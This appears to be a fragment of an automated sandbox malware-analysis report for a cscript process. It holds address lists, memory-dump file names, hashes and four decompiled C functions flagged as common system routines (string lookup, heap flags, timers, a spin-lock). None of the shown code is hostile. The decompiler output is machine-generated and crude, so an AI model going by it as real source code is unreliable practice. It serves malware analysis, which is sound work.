0x054b52d1
0x054b52d9
0x054b52dd
0x054b52e7
0x054b52f7
0x054b52f9
0x054b52fd
0x05510dcf
0x05510dd5
0x05510dd6
0x05510dd7
0x05510dd8
0x05510dd9
0x05510dde
0x05510ddf
0x05510de0
0x05510de1
0x05510de2
0x05510de2
0x05510de5
0x05510dea
0x05510dec
0x05510f60
0x05510f64
0x05510f70
0x05510f76
0x05510f79
0x05510f79
0x00000000
0x05510f64
0x05510df2
0x05510df7
0x05510e04
0x05510e04
0x05510e0d
0x05510e0d
0x05510e10
0x05510e1a
0x05510e1c
0x05510e4c
0x05510e52
0x05510e61
0x05510e67
0x05510e6b
0x05510e70
0x05510e76
0x05510ed7
0x05510edc
0x05510ee0
0x05510ee6
0x05510eea
0x05510eed
0x05510ef0
0x05510ef3
0x05510ef6
0x05510ef9
0x05510efb
0x05510efe
0x05510f01
0x05510f01
0x05510f0b
0x05510f12
0x05510f16
0x05510f18
0x05510f18
0x05510f1b
0x05510f2c
0x05510f31
0x05510f31
0x05510f35
0x05510f39
0x05510f3a
0x05510f3c
0x05510f3c
0x05510f3f
0x05510f50
0x05510f55
0x05510f55
0x05510f59
0x054b52eb
0x054b52f1
0x054b52f1
0x05510e7d
0x05510e84
0x05510e88
0x05510e8a
0x05510e8a
0x05510e8d
0x05510e9e
0x05510ea3
0x05510ea3
0x05510ea7
0x05510eaf
0x05510eb3
0x05510eb9
0x05510eb9
0x05510ebc
0x05510ecd
0x05510ecd
0x00000000
0x05510eb3
0x05510e1e
0x05510e21
0x05510e25
0x05510e2b
0x05510e2f
0x05510e30
0x05510e3a
0x05510e3f
0x05510e41
0x00000000
0x00000000
0x05510e47
0x00000000
0x05510e47
0x05510df9
0x05510dfe
0x00000000
0x00000000
0x00000000
0x05510dfe
0x054b5303
0x054b5307
0x00000000
0x054b5309
0x00000000
0x054b5309
0x054b5307
0x054b52e9
0x054b52e9
0x00000000
0x054b52e9
0x054b530e
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0204a9e0882e309b56fea0aafe55600ba597c8801888c5a6e796b9f22eb2a92
Instruction ID: 5afed857c3b8476cb0a42481e5393841df7310b3ba4a40b5919fce343222170c
Opcode Fuzzy Hash: d0204a9e0882e309b56fea0aafe55600ba597c8801888c5a6e796b9f22eb2a92
Instruction Fuzzy Hash: 6651DC31205741AFE725DF29C849BABBBE5FF84610F14091FE48583650E770E844CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 054E2AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054E2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x55a8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x55a8208; // 0x55a8207
				_t8 = _t57 + 0x55a8208; // 0x55a8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x55a8450; // 0x36b1732
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x55a821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x55a6d5c; // 0x7fc70654
							_t72 =  *0x55a6d5c; // 0x7fc70654
							_t75 =  *0x55a6d5c; // 0x7fc70654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x55a6d5c; // 0x7fc70654
							_t84 =  *0x55a6d5c; // 0x7fc70654
							_t87 =  *0x55a6d5c; // 0x7fc70654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E054FF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x054e2ae4
0x054e2aec
0x054e2aef
0x054e2af4
0x054e2af7
0x054e2afd
0x054e2b92
0x054e2b92
0x054e2b97
0x054e2b9c
0x054e2b9c
0x054e2b03
0x054e2b06
0x054e2b09
0x054e2b09
0x054e2b0f
0x054e2b15
0x054e2b15
0x054e2b1b
0x054e2b1e
0x054e2b21
0x054e2b26
0x054e2b29
0x054e2b81
0x054e2b84
0x054e2c0e
0x054e2c15
0x054e2c24
0x054e2c24
0x054e2b8a
0x054e2b8a
0x054e2b8a
0x054e2b8a
0x054e2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x054e2b4a
0x054e2b4a
0x054e2b4d
0x054e2b53
0x00000000
0x00000000
0x054e2b55
0x054e2b58
0x054e2bb7
0x05525d1b
0x05525d37
0x05525d47
0x05525d53
0x054e2bbd
0x054e2bbd
0x054e2bbd
0x054e2bb7
0x054e2b5d
0x054e2c2f
0x05525d5b
0x05525d77
0x05525d87
0x05525d93
0x054e2c35
0x054e2c35
0x054e2c35
0x054e2c2f
0x054e2b65
0x054e2b9f
0x054e2ba2
0x054e2b67
0x054e2b67
0x054e2b69
0x054e2b6b
0x054e2b6e
0x054e2bc9
0x054e2bcc
0x054e2bcf
0x054e2bd4
0x054e2bd6
0x054e2bd6
0x054e2bdb
0x054e2c02
0x054e2c05
0x054e2c07
0x00000000
0x054e2c07
0x054e2be0
0x054e2c00
0x054e2c3f
0x054e2c3f
0x00000000
0x054e2c00
0x054e2be5
0x054e2be7
0x054e2bec
0x054e2bf4
0x054e2bf6
0x00000000
0x054e2bf6
0x054e2b70
0x054e2b76
0x054e2b2b
0x054e2b2b
0x054e2b2d
0x054e2b2f
0x054e2b32
0x054e2b35
0x054e2b3a
0x00000000
0x054e2b40
0x054e2b43
0x054e2b45
0x054e2b47
0x054e2b4a
0x054e2b4d
0x054e2b53
0x00000000
0x00000000
0x00000000
0x054e2b53
0x054e2b78
0x054e2b78
0x054e2b7b
0x054e2b7e
0x00000000
0x054e2b7e
0x054e2b76
0x054e2ba5
0x054e2ba5
0x054e2ba8
0x054e2bad
0x00000000
0x00000000
0x054e2baf
0x054e2baf
0x054e2bc2
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c5cba81ae6380d635eee6319ce71ea593dda64d467771b71737bc44620fa396
Instruction ID: 6bbab2573d7749f2a9647caf8b59f0f0487021fba951c714940b5b2bebbd8eaf
Opcode Fuzzy Hash: 5c5cba81ae6380d635eee6319ce71ea593dda64d467771b71737bc44620fa396
Instruction Fuzzy Hash: D851B37AE041259FCB18CF1DC8849FEB7BAFB88701715845BE856AB350E770AE51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0557AE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0557AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0557C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0557ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0557FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0557EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E054D7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E05571608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E05581536(0x55a8ae4, (_t74 -  *0x55a8b04 >> 0x14) + (_t74 -  *0x55a8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0557C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0557A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0555CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0557ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0557ae44
0x0557ae4c
0x0557ae53
0x0557ae55
0x0557ae5c
0x0557ae64
0x0557ae68
0x0557ae75
0x0557ae75
0x0557ae78
0x0557ae7a
0x0557ae7c
0x0557ae7f
0x0557aea8
0x0557aeab
0x0557aead
0x00000000
0x00000000
0x0557aeb3
0x0557aeb8
0x0557aebb
0x0557aebd
0x00000000
0x0557ae81
0x0557ae88
0x0557ae8f
0x0557ae9b
0x0557ae96
0x0557ae96
0x0557ae96
0x0557aea0
0x0557aea3
0x0557aebf
0x0557aebf
0x0557aec3
0x0557aec9
0x0557af0d
0x0557af14
0x0557af3d
0x0557af3d
0x0557af41
0x0557af44
0x0557af67
0x0557af67
0x0557af6a
0x0557afca
0x0557afd1
0x00000000
0x0557afd1
0x0557af6c
0x0557af6d
0x0557af75
0x0557af7c
0x0557af7e
0x0557af80
0x0557af85
0x0557af87
0x0557af99
0x0557af89
0x0557af92
0x0557af92
0x0557af9e
0x0557afa1
0x0557afa3
0x0557afa9
0x0557afb0
0x0557afb2
0x0557afb4
0x0557afbc
0x0557afbc
0x0557afb4
0x0557afb0
0x00000000
0x0557afa1
0x0557af4f
0x0557af57
0x0557af5c
0x0557af5e
0x00000000
0x00000000
0x0557af60
0x0557af64
0x0557af64
0x00000000
0x0557af64
0x0557af1a
0x0557af25
0x00000000
0x00000000
0x0557af27
0x0557af28
0x0557af33
0x00000000
0x0557aed0
0x0557aed0
0x0557aed2
0x0557aee1
0x0557aee4
0x00000000
0x00000000
0x0557aee6
0x0557aeec
0x00000000
0x00000000
0x0557aefb
0x0557af07
0x0557afd3
0x0557afdb
0x0557afdb
0x00000000
0x0557af07
0x0557aed6
0x0557aed8
0x0557aedf
0x00000000
0x00000000
0x00000000
0x0557aedf
0x0557aec9

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cec1fc62510d43c7f7db37daa0ec29368ac0bc59a85e9aa2e13f83e8a7c01fe
Instruction ID: b35018f6f21c90c29e4622598caf5b1df28403fd72c3b26585fd43ac4b10b782
Opcode Fuzzy Hash: 6cec1fc62510d43c7f7db37daa0ec29368ac0bc59a85e9aa2e13f83e8a7c01fe
Instruction Fuzzy Hash: 7E41E6B17096199BD72ADA25E898F7FB79AFFC4620F044619FC27C7290DB34D801C691

Uniqueness

Uniqueness Score: -1.00%

Function 054DDBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E054DDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E054BCC50(E054B4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E054D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E05588ED6(_t102, _t98);
						}
						_t76 = _v44;
						E054D2280(_t58, _v44);
						E054DDD82(_v44, _t102, _t98);
						E054DB944(_t102, _v5);
						return E054CFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x55a8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x55a862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x55a8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x55a862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x557fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x054ddbe9
0x054ddbf2
0x054ddbf7
0x054ddbf9
0x054ddbfc
0x054ddc00
0x054ddc03
0x054ddc14
0x054ddd54
0x054ddd54
0x054ddd54
0x054ddc18
0x054ddc1d
0x054ddc1d
0x054ddc32
0x054ddc3b
0x054ddc3e
0x054ddc46
0x054ddd5b
0x054ddd62
0x054ddd64
0x054ddd67
0x054ddd69
0x054ddd6b
0x054ddd6e
0x054ddd70
0x054ddd73
0x054ddd73
0x00000000
0x054ddc4c
0x054ddc4e
0x05523ae3
0x05523ae8
0x05523aea
0x054ddce7
0x054ddce9
0x054ddcec
0x054ddcee
0x054ddcf0
0x054ddcf3
0x054ddcf5
0x05523af2
0x05523af5
0x05523af5
0x054ddd06
0x054ddd08
0x054ddd0b
0x054ddd12
0x05523b08
0x054ddd18
0x054ddd18
0x054ddd18
0x054ddd20
0x054ddd23
0x05523b16
0x05523b16
0x054ddd29
0x054ddd2d
0x054ddd36
0x054ddd40
0x054ddd51
0x054ddd51
0x054ddc54
0x054ddc59
0x054ddc59
0x054ddc5e
0x054ddc5e
0x054ddc63
0x054ddc66
0x054ddc6b
0x054ddc78
0x054ddc7b
0x054ddc81
0x054ddc81
0x054ddc83
0x054ddc89
0x00000000
0x00000000
0x054ddd7b
0x054ddd7b
0x054ddc8f
0x054ddc8f
0x054ddc92
0x054ddc99
0x054ddc9f
0x054ddca5
0x054ddcaa
0x054ddcaa
0x054ddcb3
0x054ddcb8
0x054ddcbb
0x054ddcc1
0x054ddccf
0x054ddcd2
0x054ddcd5
0x054ddcd7
0x054ddcda
0x054ddcdc
0x054ddcdc
0x054ddce2
0x054ddce4
0x00000000
0x054ddce4

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edabd4e94860067db99fa850fb6a9ab9a83ddcadab69ab234979b43ffc32327a
Instruction ID: 9005243849a0513cf46d58534577c8e1992063e26a4b5986c096682b43cb9797
Opcode Fuzzy Hash: edabd4e94860067db99fa850fb6a9ab9a83ddcadab69ab234979b43ffc32327a
Instruction Fuzzy Hash: 40519EB1E00615DFCF14CF68C4A0AEEFBF6BB49310F25855AD555A7340DB71A944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054CEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E054CEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E054B9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x779cc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E054B2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x054cef4b
0x054cef4d
0x054cef57
0x054cf0bd
0x054cf0c2
0x054cf0d2
0x054cf0d2
0x054cf0c2
0x054cef5d
0x054cef5f
0x054cef67
0x054cef6a
0x054cef6d
0x054cef74
0x054cef7f
0x054cef82
0x054cef82
0x054cef86
0x054cef88
0x054cef8c
0x054cef8f
0x054cef8f
0x054cef8f
0x00000000
0x054cef91
0x054cef93
0x054cefc4
0x054cefc4
0x054cefc4
0x054cefca
0x054cefd0
0x054cf0a6
0x00000000
0x00000000
0x054cf0af
0x0551bb06
0x0551bb0a
0x054cf0b5
0x054cf0b5
0x054cf0b5
0x054cf0b5
0x00000000
0x054cefd6
0x054cefd9
0x054cf0de
0x054cf0e2
0x054cefdf
0x054cefdf
0x054cefdf
0x054cefe5
0x0551bafc
0x0551bafc
0x054cefe5
0x054cefeb
0x054cefed
0x054cf00f
0x054cf011
0x054cf01a
0x054cf01d
0x054cf021
0x054cf028
0x054cf029
0x054cf029
0x054cf02c
0x00000000
0x054cf02c
0x054ceff3
0x054ceff9
0x054cf0ea
0x054cf0ed
0x054cf0ef
0x00000000
0x054cf0ef
0x054cf003
0x0551bb12
0x054cf045
0x054cf049
0x054cf051
0x054cf09e
0x054cf0a0
0x054cf0a0
0x054cf09e
0x054cf053
0x054cf064
0x054cf064
0x054cf06b
0x0551bb1a
0x0551bb1a
0x054cf071
0x054cf071
0x054cf07d
0x054cf082
0x054cf08f
0x054cf08f
0x054cf009
0x054cf00d
0x00000000
0x054cf00d
0x054cefd0
0x054cef97
0x054cefa5
0x054cefaa
0x00000000
0x054cefac
0x054cefac
0x054cefac
0x00000000
0x054cefb2
0x054cf036
0x054cf03a
0x054cf040
0x054cf090
0x00000000
0x054cf092
0x054cf042
0x00000000
0x054cf042
0x054cefb7
0x054cefb9
0x054cefbc
0x054cefb0
0x054cefb0
0x00000000
0x054cefbe
0x054cefbe
0x054cefc1
0x00000000
0x054cefc1
0x054cefbc
0x054cefaa
0x054cef91

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
